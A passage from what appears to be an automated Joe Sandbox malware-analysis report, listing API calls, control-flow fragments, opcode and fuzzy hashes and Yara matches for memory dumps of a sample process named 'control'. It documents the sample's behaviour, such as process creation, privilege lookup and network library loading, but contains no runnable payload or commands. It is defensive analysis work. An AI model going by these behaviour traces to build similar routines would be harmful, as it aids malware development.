              • Instruction Fuzzy Hash: D4F0F2B2210109AFDB14DF99DC85EAB7BA9EF88354F118259FA0C9B241C631E911CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EE2D11,00002000,00003000,00000004), ref: 02EFA529
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
              • Instruction ID: aba22e8d0700dbef38fed856221fe2750005a84bafcd090764c551478d0b4308
              • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
              • Instruction Fuzzy Hash: 1FF0F2B2210208ABDB14DF89DC80EAB77ADAF88654F118118BA089B241C630E8108BA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtClose.NTDLL(02EF5990,00000206,?,02EF5990,00000005,FFFFFFFF), ref: 02EFA465
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: d6a151c64568462a05cea6193ecec02a764c845c955953fcf4809a2f59c8f4a7
              • Instruction ID: 0cae3ce04f4bd245f371e546b5ee4a0857460e288ddf3a2df3b45534c528154f
              • Opcode Fuzzy Hash: d6a151c64568462a05cea6193ecec02a764c845c955953fcf4809a2f59c8f4a7
              • Instruction Fuzzy Hash: 69E08C72244204ABD610EF94DCC6E977BA9DF48620F2180A5FA085B241D531E5008AE0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtClose.NTDLL(02EF5990,00000206,?,02EF5990,00000005,FFFFFFFF), ref: 02EFA465
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
              • Instruction ID: a6ed42ad79497b0fb7472c802e426e5d27b25fd025802963a39d8eb9e0e56357
              • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
              • Instruction Fuzzy Hash: 6ED01772240218ABD620EB99DC89E977BADDF48A60F118065BA4C5B342C530FA008AE0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 41e8e47399a5abba5e68fe878d0cb6d5c63a9645c79409749a49b2188411509e
              • Instruction ID: a227e3c8c09bec971612e1613f0a4575cbc1237b0f80aa5ce7f2d928f5ff396d
              • Opcode Fuzzy Hash: 41e8e47399a5abba5e68fe878d0cb6d5c63a9645c79409749a49b2188411509e
              • Instruction Fuzzy Hash: AC9002A1242092527545B15944145074507A7E12857A1C412A1415951C8566F856F661
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 81be594b6952e173159c7efb674d8fea12a5396d26837eec772ceb612ec3f274
              • Instruction ID: b772f8075a62027cf426aec9de967c847085f156e3f5f7d576fc3190a183fe69
              • Opcode Fuzzy Hash: 81be594b6952e173159c7efb674d8fea12a5396d26837eec772ceb612ec3f274
              • Instruction Fuzzy Hash: 419002B120105513F11161594514707050A97D1285FA1C812A0425559D9696E952B161
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 3d598babdf89225522d537d31b4cff3c4402c644fd404887baab68269cfff404
              • Instruction ID: 7c283b4cdc6f358e8143e191de31e1da95908a604fd2ae23359fcde58331da8b
              • Opcode Fuzzy Hash: 3d598babdf89225522d537d31b4cff3c4402c644fd404887baab68269cfff404
              • Instruction Fuzzy Hash: 8A9002E120205103610571594424616450B97E1245B61C421E1015591DC565E8917165
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4016eaf15131eb311ec28a1f7a4c7bcab14086d9cfe5dd52e3b72e23eb2316c7
              • Instruction ID: 03afc58a9e3b3a26398566927e871afe35d65e1de0e2554c007a5fcc78e9c6c9
              • Opcode Fuzzy Hash: 4016eaf15131eb311ec28a1f7a4c7bcab14086d9cfe5dd52e3b72e23eb2316c7
              • Instruction Fuzzy Hash: 3C9002E134105542F10061594424B060506D7E2345F61C415E1065555D8659EC527166
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e02530962bb8d953c6b68bfd4780b3697f3f21a0a11fd77ad7635e9eaa7541b2
              • Instruction ID: b15118f1284df16785029aab5c59f1df5633e42e6c6b3a10c04ce01aeb06bca0
              • Opcode Fuzzy Hash: e02530962bb8d953c6b68bfd4780b3697f3f21a0a11fd77ad7635e9eaa7541b2
              • Instruction Fuzzy Hash: 2B9002A5211051032105A5590714507054797D6395361C421F1016551CD661E8617161
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: ff1e142d885b05431eca574ea6d6b4da154ab20aaee4457ad0014ba171a9be2a
              • Instruction ID: 5d03e5ff08873c1120caaa2d126a4d44fb6872b5f622ade34a5f0da48af46df2
              • Opcode Fuzzy Hash: ff1e142d885b05431eca574ea6d6b4da154ab20aaee4457ad0014ba171a9be2a
              • Instruction Fuzzy Hash: 409002F120105502F14071594414746050697D1345F61C411A5065555E8699EDD576A5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c91d909fbdda112edf01de8a20b9fb71939a65d5ce87790d6937cf99bbd19596
              • Instruction ID: 2cfa8624042bebe50c84c5402cc536be48f77594d15e35b694f0d897abaec50d
              • Opcode Fuzzy Hash: c91d909fbdda112edf01de8a20b9fb71939a65d5ce87790d6937cf99bbd19596
              • Instruction Fuzzy Hash: 059002B120105942F10061594414B46050697E1345F61C416A0125655D8655E8517561
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: db4115214d08c19be56e91fed4486740d85d480117578abdaf5f7485aea8fddd
              • Instruction ID: ef120ddf17543fb09421a2a47c3843c2d09fd3130195afbb84032899d4e8489f
              • Opcode Fuzzy Hash: db4115214d08c19be56e91fed4486740d85d480117578abdaf5f7485aea8fddd
              • Instruction Fuzzy Hash: 6C9002B12010D902F1106159841474A050697D1345F65C811A4425659D86D5E8917161
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 20fc3e25a6dfdbad342766f8396dec51387d8fd69763540d5d7718360e0a2337
              • Instruction ID: c6d39c4e8f4d7dad5eea3d975438702e3d4c79aa7fd94c6f321db7b499960dac
              • Opcode Fuzzy Hash: 20fc3e25a6dfdbad342766f8396dec51387d8fd69763540d5d7718360e0a2337
              • Instruction Fuzzy Hash: 6C9002B120509942F14071594414A46051697D1349F61C411A0065695D9665ED55B6A1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 1e2f1611870cdc0503a4bbf9b0ce5a79ed055cb9c3245d61dbc989169883c499
              • Instruction ID: 83a429e6af6a6520aed56b419184a21c1594167f8b539b80f35a2059dcaad688
              • Opcode Fuzzy Hash: 1e2f1611870cdc0503a4bbf9b0ce5a79ed055cb9c3245d61dbc989169883c499
              • Instruction Fuzzy Hash: 809002A121185142F20065694C24B07050697D1347F61C515A0155555CC955E8617561
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e705e4a397457540e603b292d33eec8e3864cc4d3f950914a209e3beced20c69
              • Instruction ID: 27add08df6639018c6b1942f954c2e9369593a81c200bdf6e60dd8a916f9fa2c
              • Opcode Fuzzy Hash: e705e4a397457540e603b292d33eec8e3864cc4d3f950914a209e3beced20c69
              • Instruction Fuzzy Hash: B19002B120105902F1807159441464A050697D2345FA1C415A0026655DCA55EA5977E1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 561da857bd6b81b3a63774d29b478a4f22b0bcfa89e497b6540216640dd8f68c
              • Instruction ID: 0a26e2ca93dee986f0c5ce1115b4fea161ca02cf4fe076ce74a18e890ad067b1
              • Opcode Fuzzy Hash: 561da857bd6b81b3a63774d29b478a4f22b0bcfa89e497b6540216640dd8f68c
              • Instruction Fuzzy Hash: 869002B131119502F11061598414706050697D2245F61C811A0825559D86D5E8917162
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2d2d67f57076c949ccfdb9ffcfb254dad1f31325f9804f1f67bd1a4744be4f62
              • Instruction ID: 3ec869d8d60f04c4e5c99b5040a682e407f325ce057f41e7b0e2d8296f6e89e9
              • Opcode Fuzzy Hash: 2d2d67f57076c949ccfdb9ffcfb254dad1f31325f9804f1f67bd1a4744be4f62
              • Instruction Fuzzy Hash: 199002A921305102F1807159541860A050697D2246FA1D815A0016559CC955E8697361
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c9fc837cb64abe10f78acaac968208c00677783c92b6bfd13f016d7d3d97e6ff
              • Instruction ID: 8051091d307fd68f103bad1d86c7a39d961de319800f70b6c38d26c486e7d0da
              • Opcode Fuzzy Hash: c9fc837cb64abe10f78acaac968208c00677783c92b6bfd13f016d7d3d97e6ff
              • Instruction Fuzzy Hash: E99002B120105502F10065995418646050697E1345F61D411A5025556EC6A5E8917171
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 393 2ef9030-2ef905f 394 2ef906b-2ef9072 393->394 395 2ef9066 call 2efbe60 393->395 396 2ef914c-2ef9152 394->396 397 2ef9078-2ef90c8 call 2efbf30 call 2eea130 call 2ef5a90 394->397 395->394 404 2ef90d0-2ef90e1 Sleep 397->404 405 2ef9146-2ef914a 404->405 406 2ef90e3-2ef90e9 404->406 405->396 405->404 407 2ef90eb-2ef9111 call 2ef8c60 406->407 408 2ef9113-2ef9133 406->408 409 2ef9139-2ef913c 407->409 408->409 410 2ef9134 call 2ef8e60 408->410 409->405 410->409
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02EF90D8
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 07fdd80105d5b63d1dba8c9a26231a7f70bed6a3a37cd6b328bfeaf2080a0caa
              • Instruction ID: 0f169aaeca2eb11958250cf89e65e89a13022637191330716eff48e9f5698442
              • Opcode Fuzzy Hash: 07fdd80105d5b63d1dba8c9a26231a7f70bed6a3a37cd6b328bfeaf2080a0caa
              • Instruction Fuzzy Hash: 41319EB2642704ABD721DF68C8A0FA7B7B9BF88704F00C12DF65A9B241D770B445CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 413 2ef9026-2ef9072 call 2efbe60 416 2ef914c-2ef9152 413->416 417 2ef9078-2ef90c8 call 2efbf30 call 2eea130 call 2ef5a90 413->417 424 2ef90d0-2ef90e1 Sleep 417->424 425 2ef9146-2ef914a 424->425 426 2ef90e3-2ef90e9 424->426 425->416 425->424 427 2ef90eb-2ef9111 call 2ef8c60 426->427 428 2ef9113-2ef9133 426->428 429 2ef9139-2ef913c 427->429 428->429 430 2ef9134 call 2ef8e60 428->430 429->425 430->429
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02EF90D8
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 3c92c9aa853b7663327822060b4870b0c89b09bb903de273b89bbb619ce4daa6
              • Instruction ID: c5423ccedf2fa6fc840d6417bfae8bdefd25f6411ca282f3bdc16184447799dd
              • Opcode Fuzzy Hash: 3c92c9aa853b7663327822060b4870b0c89b09bb903de273b89bbb619ce4daa6
              • Instruction Fuzzy Hash: 1021CEB1641704ABC710DF64C8D0FABBBB9AF48704F00C12DF6195B242D370A445CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 433 2ee7678-2ee768f 434 2ee7698-2ee76ca call 2efcb60 call 2eea130 call 2ef5a90 433->434 435 2ee7693 call 2efbf80 433->435 442 2ee76fe-2ee7702 434->442 443 2ee76cc-2ee76de PostThreadMessageW 434->443 435->434 444 2ee76fd 443->444 445 2ee76e0-2ee76fb call 2ee9890 PostThreadMessageW 443->445 444->442 445->444
              APIs
              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 02EE76DA
              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 02EE76FB
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 47f1743a804f868d1c142f8bceb62b221fbca580b5190fb738bcd0829f36059d
              • Instruction ID: f7ae3f3adcf334553e49671f4c2f28af7530b7126ad2b0bf1bef6e7048ca7f93
              • Opcode Fuzzy Hash: 47f1743a804f868d1c142f8bceb62b221fbca580b5190fb738bcd0829f36059d
              • Instruction Fuzzy Hash: 79019C32AC02297AEB20A6908C42FFE775C9F00F44F154019FF04BA1C0E7D42A068BF4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              APIs
              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 02EE76DA
              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 02EE76FB
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
              • Instruction ID: 3cdca15212d5e3b135e35e034a67854cb2f4a5739fbc8f17561f09c1da43ad0a
              • Opcode Fuzzy Hash: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
              • Instruction Fuzzy Hash: 4D01A771AC022976EB20AA959C42FBEB76C9B04F54F158119FF04BA1C0EBD479054BF9
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 666 2efa7f1-2efa7f6 667 2efa7f8 666->667 668 2efa7b6-2efa7f0 call 2efaf60 666->668 669 2efa79c-2efa7b4 LookupPrivilegeValueW 667->669 670 2efa7fa-2efa814 667->670 672 2efa81a-2efa827 670->672 673 2efa815 call 2efb030 670->673 673->672
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EED5B2,02EED5B2,?,00000000,?,?), ref: 02EFA7B0
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: fd0738ac1fd51bf59c4e04e2d774b230a6531cdc2a985629a259691ce5639772
              • Instruction ID: 63e6795f76e37d55e7e14801cbff236fdd0aed665376a1e324f7e96268fe5d4c
              • Opcode Fuzzy Hash: fd0738ac1fd51bf59c4e04e2d774b230a6531cdc2a985629a259691ce5639772
              • Instruction Fuzzy Hash: 1511A3B6600214AFDB14DFA8CC84EE77B69EF48350F15C559F95D9B342C231E910CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 677 2efa772-2efa777 678 2efa779-2efa77f 677->678 679 2efa704-2efa709 677->679 682 2efa7d6-2efa7d9 678->682 683 2efa781-2efa799 678->683 680 2efa70f-2efa724 679->680 681 2efa70a call 2efaf60 679->681 681->680 687 2efa7df-2efa7f0 682->687 688 2efa7da call 2efaf60 682->688 684 2efa79f-2efa7b4 LookupPrivilegeValueW 683->684 685 2efa79a call 2efaf60 683->685 685->684 688->687
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EED5B2,02EED5B2,?,00000000,?,?), ref: 02EFA7B0
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 7376fb6ca21cac78634fa60254d337852cdd1e877ece9cf3ee93e3fceb11d659
              • Instruction ID: fe067f6706752bb2aeb3fe29ce7c00e613a70e20ee4dfc26e7eef9f42c396dd2
              • Opcode Fuzzy Hash: 7376fb6ca21cac78634fa60254d337852cdd1e877ece9cf3ee93e3fceb11d659
              • Instruction Fuzzy Hash: E9018EB62402086FCB10EF69DC44DE737A9EF84218F11C555FE4D4B342D631E8108AB1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 691 2eea130-2eea159 call 2efcdb0 694 2eea15f-2eea16d call 2efd1d0 691->694 695 2eea15b-2eea15e 691->695 698 2eea16f-2eea17a call 2efd450 694->698 699 2eea17d-2eea18e call 2efb500 694->699 698->699 704 2eea1a7-2eea1aa 699->704 705 2eea190-2eea1a4 LdrLoadDll 699->705 705->704
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02EEA1A2
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction ID: f8113ce8a1c5e7db500eb0e014931f8fceb6273c488a2dac2a759b313e505f31
              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction Fuzzy Hash: 580121B5E4020DABDF10EBE4DC41FDDB7B99B44308F1091A9EA0997241F671E718CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02EFA6E4
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 57a27672742c05844aeefe1364824c7227a599750b68038cb86cb0939a9c65d2
              • Instruction ID: ae0323efa59b1412b391ea1c588ab8b43ec342311b4220357a85ca2441f8c40c
              • Opcode Fuzzy Hash: 57a27672742c05844aeefe1364824c7227a599750b68038cb86cb0939a9c65d2
              • Instruction Fuzzy Hash: FF019DB2214108AFCB54CF99DC80EEB77A9AF8C754F158258BA0DA7251C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02EFA6E4
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
              • Instruction ID: fcf0548b8f57ad4bbc91d4cf85235f599d6e12b26eb8c180fe6f28f921da8673
              • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
              • Instruction Fuzzy Hash: E501B2B2210108BFCB54DF89DC80EEB77ADAF8C754F118258BA0D97240C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02EED2E0,?,?), ref: 02EF919C
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: bcc55e10a08d8f04f23789298421292f34d70b37254d9ad75765260922da6336
              • Instruction ID: a55623453774ee4b65ac8ef9ced88797f547aa63a2363179d9ba72ca2a9b25a1
